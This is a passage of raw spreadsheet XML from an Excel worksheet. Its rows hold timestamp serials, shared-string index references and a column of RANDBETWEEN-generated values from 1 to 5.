        <f t="shared" ca="1" si="72"/>
        <v>1</v>
      </c>
    </row>
    <row r="4663" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4663" s="1">
        <v>43472.589166666665</v>
      </c>
      <c r="B4663" t="s">
        <v>13</v>
      </c>
      <c r="C4663" t="s">
        <v>6</v>
      </c>
      <c r="D4663" t="s">
        <v>25</v>
      </c>
      <c r="F4663">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4664" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4664" s="1">
        <v>43472.587719907409</v>
      </c>
      <c r="B4664" t="s">
        <v>19</v>
      </c>
      <c r="C4664" t="s">
        <v>6</v>
      </c>
      <c r="D4664" t="s">
        <v>25</v>
      </c>
      <c r="E4664" t="s">
        <v>32</v>
      </c>
      <c r="F4664">
        <f t="shared" ca="1" si="72"/>
        <v>1</v>
      </c>
    </row>
    <row r="4665" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4665" s="1">
        <v>43472.586759259262</v>
      </c>
      <c r="B4665" t="s">
        <v>19</v>
      </c>
      <c r="C4665" t="s">
        <v>6</v>
      </c>
      <c r="D4665" t="s">
        <v>25</v>
      </c>
      <c r="E4665" t="s">
        <v>32</v>
      </c>
      <c r="F4665">
        <f t="shared" ca="1" si="72"/>
        <v>3</v>
      </c>
    </row>
    <row r="4666" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4666" s="1">
        <v>43472.586724537039</v>
      </c>
      <c r="B4666" t="s">
        <v>19</v>
      </c>
      <c r="C4666" t="s">
        <v>10</v>
      </c>
      <c r="D4666" t="s">
        <v>107</v>
      </c>
      <c r="E4666" s="2" t="s">
        <v>4457</v>
      </c>
      <c r="F4666">
        <f t="shared" ca="1" si="72"/>
        <v>3</v>
      </c>
    </row>
    <row r="4667" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4667" s="1">
        <v>43472.585613425923</v>
      </c>
      <c r="B4667" t="s">
        <v>19</v>
      </c>
      <c r="C4667" t="s">
        <v>6</v>
      </c>
      <c r="D4667" t="s">
        <v>25</v>
      </c>
      <c r="E4667" t="s">
        <v>32</v>
      </c>
      <c r="F4667">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4668" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4668" s="1">
        <v>43472.5784375</v>
      </c>
      <c r="B4668" t="s">
        <v>35</v>
      </c>
      <c r="C4668" t="s">
        <v>10</v>
      </c>
      <c r="D4668" t="s">
        <v>33</v>
      </c>
      <c r="F4668">
        <f t="shared" ca="1" si="72"/>
        <v>5</v>
      </c>
    </row>
    <row r="4669" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4669" s="1">
        <v>43472.575243055559</v>
      </c>
      <c r="B4669" t="s">
        <v>5</v>
      </c>
      <c r="C4669" t="s">
        <v>71</v>
      </c>
      <c r="E4669" t="s">
        <v>828</v>
      </c>
      <c r="F4669">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4670" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4670" s="1">
        <v>43472.574479166666</v>
      </c>
      <c r="B4670" t="s">
        <v>5</v>
      </c>
      <c r="C4670" t="s">
        <v>48</v>
      </c>
      <c r="E4670" t="s">
        <v>828</v>
      </c>
      <c r="F4670">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4671" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4671" s="1">
        <v>43472.574108796296</v>
      </c>
      <c r="B4671" t="s">
        <v>5</v>
      </c>
      <c r="C4671" t="s">
        <v>6</v>
      </c>
      <c r="D4671" t="s">
        <v>25</v>
      </c>
      <c r="E4671" t="s">
        <v>828</v>
      </c>
      <c r="F4671">
        <f t="shared" ca="1" si="72"/>
        <v>4</v>
      </c>
    </row>
    <row r="4672" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4672" s="1">
        <v>43472.572708333333</v>
      </c>
      <c r="B4672" t="s">
        <v>5</v>
      </c>
      <c r="C4672" t="s">
        <v>50</v>
      </c>
      <c r="E4672" t="s">
        <v>828</v>
      </c>
      <c r="F4672">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4673" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4673" s="1">
        <v>43472.571608796294</v>
      </c>
      <c r="B4673" t="s">
        <v>5</v>
      </c>
      <c r="C4673" t="s">
        <v>16</v>
      </c>
      <c r="E4673" t="s">
        <v>828</v>
      </c>
      <c r="F4673">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4674" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4674" s="1">
        <v>43472.570798611108</v>
      </c>
      <c r="B4674" t="s">
        <v>5</v>
      </c>
      <c r="C4674" t="s">
        <v>48</v>
      </c>
      <c r="E4674" t="s">
        <v>828</v>
      </c>
      <c r="F4674">
        <f t="shared" ref="F4674:F4737" ca="1" si="73">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="4675" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4675" s="1">
        <v>43472.569652777776</v>
      </c>
      <c r="B4675" t="s">
        <v>5</v>
      </c>
      <c r="C4675" t="s">
        <v>71</v>
      </c>
      <c r="E4675" t="s">
        <v>828</v>
      </c>
      <c r="F4675">
        <f t="shared" ca="1" si="73"/>
        <v>1</v>
      </c>
    </row>
    <row r="4676" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4676" s="1">
        <v>43472.569004629629</v>
      </c>
      <c r="B4676" t="s">
        <v>5</v>
      </c>
      <c r="C4676" t="s">
        <v>65</v>
      </c>
      <c r="E4676" t="s">
        <v>828</v>
      </c>
      <c r="F4676">
        <f t="shared" ca="1" si="73"/>
        <v>5</v>
      </c>
    </row>
    <row r="4677" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4677" s="1">
        <v>43472.568391203706</v>
      </c>
      <c r="B4677" t="s">
        <v>5</v>
      </c>
      <c r="C4677" t="s">
        <v>6</v>
      </c>
      <c r="D4677" t="s">
        <v>25</v>
      </c>
      <c r="E4677" t="s">
        <v>828</v>
      </c>
      <c r="F4677">
        <f t="shared" ca="1" si="73"/>
        <v>1</v>
      </c>
    </row>
    <row r="4678" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4678" s="1">
        <v>43472.542337962965</v>
      </c>
      <c r="C4678" t="s">
        <v>10</v>
      </c>
      <c r="D4678" t="s">
        <v>336</v>
      </c>
      <c r="E4678" t="s">
        <v>4458</v>
      </c>
      <c r="F4678">
        <f t="shared" ca="1" si="73"/>
        <v>3</v>
      </c>
    </row>
    <row r="4679" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4679" s="1">
        <v>43472.542141203703</v>
      </c>
      <c r="B4679" t="s">
        <v>5</v>
      </c>
      <c r="C4679" t="s">
        <v>6</v>
      </c>
      <c r="D4679" t="s">
        <v>821</v>
      </c>
      <c r="E4679" s="2" t="s">
        <v>4459</v>
      </c>
      <c r="F4679">
        <f t="shared" ca="1" si="73"/>
        <v>3</v>
      </c>
    </row>
    <row r="4680" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4680" s="1">
        <v>43472.521215277775</v>
      </c>
      <c r="B4680" t="s">
        <v>13</v>
      </c>
      <c r="C4680" t="s">
        <v>10</v>
      </c>
      <c r="D4680" t="s">
        <v>36</v>
      </c>
      <c r="E4680" t="s">
        <v>4460</v>
      </c>
      <c r="F4680">
        <f t="shared" ca="1" si="73"/>
        <v>1</v>
      </c>
    </row>
    <row r="4681" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4681" s="1">
        <v>43472.520983796298</v>
      </c>
      <c r="B4681" t="s">
        <v>13</v>
      </c>
      <c r="C4681" t="s">
        <v>10</v>
      </c>
      <c r="D4681" t="s">
        <v>89</v>
      </c>
      <c r="E4681" t="s">
        <v>4461</v>
      </c>
      <c r="F4681">
        <f t="shared" ca="1" si="73"/>
        <v>1</v>
      </c>
    </row>
    <row r="4682" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4682" s="1">
        <v>43472.510821759257</v>
      </c>
      <c r="B4682" t="s">
        <v>5</v>
      </c>
      <c r="C4682" t="s">
        <v>318</v>
      </c>
      <c r="E4682" t="s">
        <v>4462</v>
      </c>
      <c r="F4682">
        <f t="shared" ca="1" si="73"/>
        <v>5</v>
      </c>
    </row>
    <row r="4683" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4683" s="1">
        <v>43472.499155092592</v>
      </c>
      <c r="B4683" t="s">
        <v>19</v>
      </c>
      <c r="C4683" t="s">
        <v>6</v>
      </c>
      <c r="D4683" t="s">
        <v>25</v>
      </c>
      <c r="E4683" t="s">
        <v>4463</v>
      </c>
      <c r="F4683">
        <f t="shared" ca="1" si="73"/>
        <v>4</v>
      </c>
    </row>
    <row r="4684" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4684" s="1">
        <v>43472.499016203707</v>
      </c>
      <c r="B4684" t="s">
        <v>19</v>
      </c>
      <c r="C4684" t="s">
        <v>6</v>
      </c>
      <c r="D4684" t="s">
        <v>25</v>
      </c>
      <c r="E4684" t="s">
        <v>32</v>
      </c>
      <c r="F4684">
        <f t="shared" ca="1" si="73"/>
        <v>4</v>
      </c>
    </row>
    <row r="4685" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4685" s="1">
        <v>43472.496215277781</v>
      </c>
      <c r="B4685" t="s">
        <v>5</v>
      </c>
      <c r="C4685" t="s">
        <v>10</v>
      </c>
      <c r="D4685" t="s">
        <v>151</v>
      </c>
      <c r="E4685" t="s">
        <v>4464</v>
      </c>
      <c r="F4685">
        <f t="shared" ca="1" si="73"/>
        <v>5</v>
      </c>
    </row>
    <row r="4686" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4686" s="1">
        <v>43472.48704861111</v>
      </c>
      <c r="B4686" t="s">
        <v>5</v>
      </c>
      <c r="C4686" t="s">
        <v>10</v>
      </c>
      <c r="D4686" t="s">
        <v>494</v>
      </c>
      <c r="E4686" t="s">
        <v>4465</v>
      </c>
      <c r="F4686">
        <f t="shared" ca="1" si="73"/>
        <v>3</v>
      </c>
    </row>
    <row r="4687" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4687" s="1">
        <v>43472.486550925925</v>
      </c>
      <c r="B4687" t="s">
        <v>5</v>
      </c>
      <c r="C4687" t="s">
        <v>10</v>
      </c>
      <c r="E4687" s="2" t="s">
        <v>4466</v>
      </c>
      <c r="F4687">
        <f t="shared" ca="1" si="73"/>
        <v>5</v>
      </c>
    </row>
    <row r="4688" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A4688" s="1">
        <v>43472.479108796295</v>
      </c>
      <c r="B4688" t="s">
        <v>5</v>
      </c>
      <c r="C4688" t="s">
        <v>48</v>
      </c>
      <c r="E4688" s="2" t="s">
        <v>4467</v>
      </c>
      <c r="F4688">
        <f t="shared" ca="1" si="73"/>
        <v>2</v>
      </c>
    </row>
    <row r="4689" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4689" s="1">
        <v>43472.477361111109</v>
      </c>
      <c r="B4689" t="s">
        <v>5</v>
      </c>
      <c r="C4689" t="s">
        <v>6</v>
      </c>
      <c r="D4689" t="s">
        <v>25</v>
      </c>
      <c r="E4689" t="s">
        <v>828</v>
      </c>
      <c r="F4689">
        <f t="shared" ca="1" si="73"/>
        <v>1</v>
      </c>
    </row>
    <row r="4690" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4690" s="1">
        <v>43472.475752314815</v>
      </c>
      <c r="B4690" t="s">
        <v>13</v>
      </c>
      <c r="C4690" t="s">
        <v>173</v>
      </c>
      <c r="E4690" s="2" t="s">
        <v>4468</v>
      </c>
      <c r="F4690">
        <f t="shared" ca="1" si="73"/>
        <v>4</v>
      </c>
    </row>
    <row r="4691" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4691" s="1">
        <v>43472.468726851854</v>
      </c>
      <c r="B4691" t="s">
        <v>13</v>
      </c>
      <c r="C4691" t="s">
        <v>10</v>
      </c>
      <c r="D4691" t="s">
        <v>336</v>
      </c>
      <c r="E4691" s="2" t="s">
        <v>4469</v>
      </c>
      <c r="F4691">
        <f t="shared" ca="1" si="73"/>
        <v>4</v>
      </c>
    </row>
    <row r="4692" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4692" s="1">
        <v>43472.465543981481</v>
      </c>
      <c r="B4692" t="s">
        <v>19</v>
      </c>
      <c r="C4692" t="s">
        <v>10</v>
      </c>
      <c r="D4692" t="s">
        <v>151</v>
      </c>
      <c r="E4692" t="s">
        <v>4470</v>
      </c>
      <c r="F4692">
        <f t="shared" ca="1" si="73"/>
        <v>3</v>
      </c>
    </row>
    <row r="4693" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4693" s="1">
        <v>43472.465046296296</v>
      </c>
      <c r="B4693" t="s">
        <v>5</v>
      </c>
      <c r="C4693" t="s">
        <v>6</v>
      </c>
      <c r="D4693" t="s">
        <v>25</v>
      </c>
      <c r="E4693" t="s">
        <v>1920</v>
      </c>
      <c r="F4693">
        <f t="shared" ca="1" si="73"/>
        <v>4</v>
      </c>
    </row>
    <row r="4694" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4694" s="1">
        <v>43472.464375000003</v>
      </c>
      <c r="B4694" t="s">
        <v>19</v>
      </c>
      <c r="C4694" t="s">
        <v>10</v>
      </c>
      <c r="D4694" t="s">
        <v>89</v>
      </c>
      <c r="E4694" t="s">
        <v>4471</v>
      </c>
      <c r="F4694">
        <f t="shared" ca="1" si="73"/>
        <v>1</v>
      </c>
    </row>
    <row r="4695" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4695" s="1">
        <v>43472.460405092592</v>
      </c>
      <c r="B4695" t="s">
        <v>5</v>
      </c>
      <c r="C4695" t="s">
        <v>10</v>
      </c>
      <c r="D4695" t="s">
        <v>80</v>
      </c>
      <c r="E4695" t="s">
        <v>4472</v>
      </c>
      <c r="F4695">
        <f t="shared" ca="1" si="73"/>
        <v>5</v>
      </c>
    </row>
    <row r="4696" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4696" s="1">
        <v>43472.455405092594</v>
      </c>
      <c r="B4696" t="s">
        <v>13</v>
      </c>
      <c r="C4696" t="s">
        <v>10</v>
      </c>
      <c r="D4696" t="s">
        <v>20</v>
      </c>
      <c r="E4696" t="s">
        <v>4473</v>
      </c>
      <c r="F4696">
        <f t="shared" ca="1" si="73"/>
        <v>4</v>
      </c>
    </row>
    <row r="4697" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4697" s="1">
        <v>43472.455370370371</v>
      </c>
      <c r="B4697" t="s">
        <v>13</v>
      </c>
      <c r="C4697" t="s">
        <v>10</v>
      </c>
      <c r="D4697" t="s">
        <v>20</v>
      </c>
      <c r="E4697" t="s">
        <v>4473</v>
      </c>
      <c r="F4697">
        <f t="shared" ca="1" si="73"/>
        <v>2</v>
      </c>
    </row>
    <row r="4698" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4698" s="1">
        <v>43472.451608796298</v>
      </c>
      <c r="B4698" t="s">
        <v>13</v>
      </c>
      <c r="C4698" t="s">
        <v>197</v>
      </c>
      <c r="E4698" s="2" t="s">
        <v>4474</v>
      </c>
      <c r="F4698">
        <f t="shared" ca="1" si="73"/>
        <v>5</v>
      </c>
    </row>
    <row r="4699" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4699" s="1">
        <v>43472.451493055552</v>
      </c>
      <c r="C4699" t="s">
        <v>6</v>
      </c>
      <c r="D4699" t="s">
        <v>25</v>
      </c>
      <c r="E4699" t="s">
        <v>828</v>
      </c>
      <c r="F4699">
        <f t="shared" ca="1" si="73"/>
        <v>2</v>
      </c>
    </row>
    <row r="4700" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A4700" s="1">
        <v>43472.42454861111</v>
      </c>
      <c r="B4700" t="s">
        <v>5</v>
      </c>
      <c r="C4700" t="s">
        <v>48</v>
      </c>
      <c r="E4700" s="2" t="s">
        <v>4475</v>
      </c>
      <c r="F4700">
        <f t="shared" ca="1" si="73"/>
        <v>4</v>
      </c>
    </row>
    <row r="4701" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4701" s="1">
        <v>43472.418564814812</v>
      </c>
      <c r="B4701" t="s">
        <v>19</v>
      </c>
      <c r="C4701" t="s">
        <v>10</v>
      </c>
      <c r="D4701" t="s">
        <v>80</v>
      </c>
      <c r="E4701" t="s">
        <v>4476</v>
      </c>
      <c r="F4701">
        <f t="shared" ca="1" si="73"/>
        <v>1</v>
      </c>
    </row>
    <row r="4702" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4702" s="1">
        <v>43472.416886574072</v>
      </c>
      <c r="B4702" t="s">
        <v>13</v>
      </c>
      <c r="C4702" t="s">
        <v>10</v>
      </c>
      <c r="D4702" t="s">
        <v>336</v>
      </c>
      <c r="E4702" t="s">
        <v>4477</v>
      </c>
      <c r="F4702">
        <f t="shared" ca="1" si="73"/>
        <v>4</v>
      </c>
    </row>
    <row r="4703" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4703" s="1">
        <v>43472.394733796296</v>
      </c>
      <c r="B4703" t="s">
        <v>13</v>
      </c>
      <c r="C4703" t="s">
        <v>10</v>
      </c>
      <c r="D4703" t="s">
        <v>178</v>
      </c>
      <c r="E4703" t="s">
        <v>4478</v>
      </c>
      <c r="F4703">
        <f t="shared" ca="1" si="73"/>
        <v>2</v>
      </c>
    </row>
    <row r="4704" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4704" s="1">
        <v>43472.392650462964</v>
      </c>
      <c r="B4704" t="s">
        <v>1305</v>
      </c>
      <c r="C4704" t="s">
        <v>41</v>
      </c>
      <c r="E4704" t="s">
        <v>4479</v>
      </c>
      <c r="F4704">
        <f t="shared" ca="1" si="73"/>
        <v>2</v>
      </c>
    </row>
    <row r="4705" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4705" s="1">
        <v>43472.369270833333</v>
      </c>
      <c r="B4705" t="s">
        <v>5</v>
      </c>
      <c r="C4705" t="s">
        <v>71</v>
      </c>
      <c r="E4705" s="2" t="s">
        <v>4480</v>
      </c>
      <c r="F4705">
        <f t="shared" ca="1" si="73"/>
        <v>1</v>
      </c>
    </row>
    <row r="4706" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4706" s="1">
        <v>43472.342199074075</v>
      </c>
      <c r="B4706" t="s">
        <v>5</v>
      </c>
      <c r="C4706" t="s">
        <v>10</v>
      </c>
      <c r="D4706" t="s">
        <v>20</v>
      </c>
      <c r="E4706" s="2" t="s">
        <v>4481</v>
      </c>
      <c r="F4706">
        <f t="shared" ca="1" si="73"/>
        <v>2</v>
      </c>
    </row>
    <row r="4707" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4707" s="1">
        <v>43472.337476851855</v>
      </c>
      <c r="B4707" t="s">
        <v>5</v>
      </c>
      <c r="C4707" t="s">
        <v>41</v>
      </c>
      <c r="E4707" t="s">
        <v>4482</v>
      </c>
      <c r="F4707">
        <f t="shared" ca="1" si="73"/>
        <v>4</v>
      </c>
    </row>
    <row r="4708" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4708" s="1">
        <v>43472.334513888891</v>
      </c>
      <c r="B4708" t="s">
        <v>5</v>
      </c>
      <c r="C4708" t="s">
        <v>10</v>
      </c>
      <c r="D4708" t="s">
        <v>39</v>
      </c>
      <c r="E4708" t="s">
        <v>4483</v>
      </c>
      <c r="F4708">
        <f t="shared" ca="1" si="73"/>
        <v>4</v>
      </c>
    </row>
    <row r="4709" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4709" s="1">
        <v>43472.327766203707</v>
      </c>
      <c r="B4709" t="s">
        <v>5</v>
      </c>
      <c r="C4709" t="s">
        <v>50</v>
      </c>
      <c r="E4709" s="2" t="s">
        <v>4484</v>
      </c>
      <c r="F4709">
        <f t="shared" ca="1" si="73"/>
        <v>5</v>
      </c>
    </row>
    <row r="4710" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4710" s="1">
        <v>43472.304097222222</v>
      </c>
      <c r="B4710" t="s">
        <v>35</v>
      </c>
      <c r="C4710" t="s">
        <v>43</v>
      </c>
      <c r="E4710" s="2" t="s">
        <v>4485</v>
      </c>
      <c r="F4710">
        <f t="shared" ca="1" si="73"/>
        <v>3</v>
      </c>
    </row>
    <row r="4711" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4711" s="1">
        <v>43472.295671296299</v>
      </c>
      <c r="B4711" t="s">
        <v>19</v>
      </c>
      <c r="C4711" t="s">
        <v>60</v>
      </c>
      <c r="E4711" t="s">
        <v>4486</v>
      </c>
      <c r="F4711">
        <f t="shared" ca="1" si="73"/>
        <v>2</v>
      </c>
    </row>
    <row r="4712" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A4712" s="1">
        <v>43472.284432870372</v>
      </c>
      <c r="B4712" t="s">
        <v>5</v>
      </c>
      <c r="C4712" t="s">
        <v>71</v>
      </c>
      <c r="E4712" s="2" t="s">
        <v>4487</v>
      </c>
      <c r="F4712">
        <f t="shared" ca="1" si="73"/>
        <v>1</v>
      </c>
    </row>
    <row r="4713" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A4713" s="1">
        <v>43472.274398148147</v>
      </c>
      <c r="B4713" t="s">
        <v>5</v>
      </c>
      <c r="C4713" t="s">
        <v>430</v>
      </c>
      <c r="E4713" s="2" t="s">
        <v>4488</v>
      </c>
      <c r="F4713">
        <f t="shared" ca="1" si="73"/>
        <v>1</v>
      </c>
    </row>
    <row r="4714" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4714" s="1">
        <v>43472.272314814814</v>
      </c>
      <c r="B4714" t="s">
        <v>13</v>
      </c>
      <c r="C4714" t="s">
        <v>318</v>
      </c>
      <c r="E4714" t="s">
        <v>4489</v>
      </c>
      <c r="F4714">
        <f t="shared" ca="1" si="73"/>
        <v>3</v>
      </c>
    </row>
    <row r="4715" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4715" s="1">
        <v>43472.262916666667</v>
      </c>
      <c r="B4715" t="s">
        <v>19</v>
      </c>
      <c r="C4715" t="s">
        <v>559</v>
      </c>
      <c r="E4715" t="s">
        <v>4490</v>
      </c>
      <c r="F4715">
        <f t="shared" ca="1" si="73"/>
        <v>3</v>
      </c>
    </row>
    <row r="4716" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4716" s="1">
        <v>43472.25273148148</v>
      </c>
      <c r="B4716" t="s">
        <v>5</v>
      </c>
      <c r="C4716" t="s">
        <v>43</v>
      </c>
      <c r="E4716" s="2" t="s">
        <v>4491</v>
      </c>
      <c r="F4716">
        <f t="shared" ca="1" si="73"/>
        <v>4</v>
      </c>
    </row>
    <row r="4717" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4717" s="1">
        <v>43472.164097222223</v>
      </c>
      <c r="B4717" t="s">
        <v>19</v>
      </c>
      <c r="C4717" t="s">
        <v>71</v>
      </c>
      <c r="E4717" t="s">
        <v>4492</v>
      </c>
      <c r="F4717">
        <f t="shared" ca="1" si="73"/>
        <v>1</v>
      </c>
    </row>
    <row r="4718" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4718" s="1">
        <v>43472.163287037038</v>
      </c>
      <c r="B4718" t="s">
        <v>19</v>
      </c>
      <c r="C4718" t="s">
        <v>71</v>
      </c>
      <c r="E4718" t="s">
        <v>4493</v>
      </c>
      <c r="F4718">
        <f t="shared" ca="1" si="73"/>
        <v>2</v>
      </c>
    </row>
    <row r="4719" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4719" s="1">
        <v>43472.163182870368</v>
      </c>
      <c r="B4719" t="s">
        <v>19</v>
      </c>
      <c r="C4719" t="s">
        <v>71</v>
      </c>
      <c r="E4719" t="s">
        <v>4493</v>
      </c>
      <c r="F4719">
        <f t="shared" ca="1" si="73"/>
        <v>5</v>
      </c>
    </row>
    <row r="4720" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4720" s="1">
        <v>43472.162939814814</v>
      </c>
      <c r="B4720" t="s">
        <v>19</v>
      </c>
      <c r="C4720" t="s">
        <v>71</v>
      </c>
      <c r="E4720" t="s">
        <v>4493</v>
      </c>
      <c r="F4720">
        <f t="shared" ca="1" si="73"/>
        <v>4</v>
      </c>
    </row>
    <row r="4721" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4721" s="1">
        <v>43472.157708333332</v>
      </c>
      <c r="B4721" t="s">
        <v>19</v>
      </c>
      <c r="C4721" t="s">
        <v>69</v>
      </c>
      <c r="E4721" t="s">
        <v>4494</v>
      </c>
      <c r="F4721">
        <f t="shared" ca="1" si="73"/>
        <v>4</v>
      </c>
    </row>
    <row r="4722" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A4722" s="1">
        <v>43472.15425925926</v>
      </c>
      <c r="B4722" t="s">
        <v>35</v>
      </c>
      <c r="C4722" t="s">
        <v>2545</v>
      </c>
      <c r="E4722" s="2" t="s">
        <v>4495</v>
      </c>
      <c r="F4722">
        <f t="shared" ca="1" si="73"/>
        <v>5</v>
      </c>
    </row>
    <row r="4723" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4723" s="1">
        <v>43472.143460648149</v>
      </c>
      <c r="B4723" t="s">
        <v>13</v>
      </c>
      <c r="C4723" t="s">
        <v>328</v>
      </c>
      <c r="E4723" t="s">
        <v>4496</v>
      </c>
      <c r="F4723">
        <f t="shared" ca="1" si="73"/>
        <v>3</v>
      </c>
    </row>
    <row r="4724" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A4724" s="1">
        <v>43472.106782407405</v>
      </c>
      <c r="B4724" t="s">
        <v>5</v>
      </c>
      <c r="C4724" t="s">
        <v>1080</v>
      </c>
      <c r="E4724" s="2" t="s">
        <v>4497</v>
      </c>
      <c r="F4724">
        <f t="shared" ca="1" si="73"/>
        <v>3</v>
      </c>
    </row>
    <row r="4725" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4725" s="1">
        <v>43472.071481481478</v>
      </c>
      <c r="B4725" t="s">
        <v>1305</v>
      </c>
      <c r="C4725" t="s">
        <v>41</v>
      </c>
      <c r="F4725">
        <f t="shared" ca="1" si="73"/>
        <v>3</v>
      </c>
    </row>
    <row r="4726" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4726" s="1">
        <v>43472.053229166668</v>
      </c>
      <c r="B4726" t="s">
        <v>35</v>
      </c>
      <c r="C4726" t="s">
        <v>140</v>
      </c>
      <c r="D4726" t="s">
        <v>847</v>
      </c>
      <c r="E4726" t="s">
        <v>4498</v>
      </c>
      <c r="F4726">
        <f t="shared" ca="1" si="73"/>
        <v>2</v>
      </c>
    </row>
    <row r="4727" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4727" s="1">
        <v>43472.022534722222</v>
      </c>
      <c r="B4727" t="s">
        <v>35</v>
      </c>
      <c r="C4727" t="s">
        <v>2108</v>
      </c>
      <c r="E4727" t="s">
        <v>4499</v>
      </c>
      <c r="F4727">
        <f t="shared" ca="1" si="73"/>
        <v>5</v>
      </c>
    </row>
    <row r="4728" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4728" s="1">
        <v>43472.018553240741</v>
      </c>
      <c r="B4728" t="s">
        <v>35</v>
      </c>
      <c r="C4728" t="s">
        <v>430</v>
      </c>
      <c r="E4728" t="s">
        <v>4499</v>
      </c>
      <c r="F4728">
        <f t="shared" ca="1" si="73"/>
        <v>5</v>
      </c>
    </row>
    <row r="4729" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4729" s="1">
        <v>43472.017546296294</v>
      </c>
      <c r="B4729" t="s">
        <v>35</v>
      </c>
      <c r="C4729" t="s">
        <v>4500</v>
      </c>
      <c r="E4729" t="s">
        <v>4499</v>
      </c>
      <c r="F4729">
        <f t="shared" ca="1" si="73"/>
        <v>1</v>
      </c>
    </row>
    <row r="4730" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4730" s="1">
        <v>43472.012604166666</v>
      </c>
      <c r="B4730" t="s">
        <v>35</v>
      </c>
      <c r="C4730" t="s">
        <v>140</v>
      </c>
      <c r="D4730" t="s">
        <v>141</v>
      </c>
      <c r="E4730" t="s">
        <v>4501</v>
      </c>
      <c r="F4730">
        <f t="shared" ca="1" si="73"/>
        <v>2</v>
      </c>
    </row>
    <row r="4731" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4731" s="1">
        <v>43471.999791666669</v>
      </c>
      <c r="B4731" t="s">
        <v>19</v>
      </c>
      <c r="C4731" t="s">
        <v>41</v>
      </c>
      <c r="E4731" s="2" t="s">
        <v>4502</v>
      </c>
      <c r="F4731">
        <f t="shared" ca="1" si="73"/>
        <v>5</v>
      </c>
    </row>
    <row r="4732" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4732" s="1">
        <v>43471.652557870373</v>
      </c>
      <c r="C4732" t="s">
        <v>10</v>
      </c>
      <c r="D4732" t="s">
        <v>36</v>
      </c>
      <c r="E4732" t="s">
        <v>4503</v>
      </c>
      <c r="F4732">
        <f t="shared" ca="1" si="73"/>
        <v>3</v>
      </c>
    </row>
    <row r="4733" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4733" s="1">
        <v>43471.64539351852</v>
      </c>
      <c r="B4733" t="s">
        <v>5</v>
      </c>
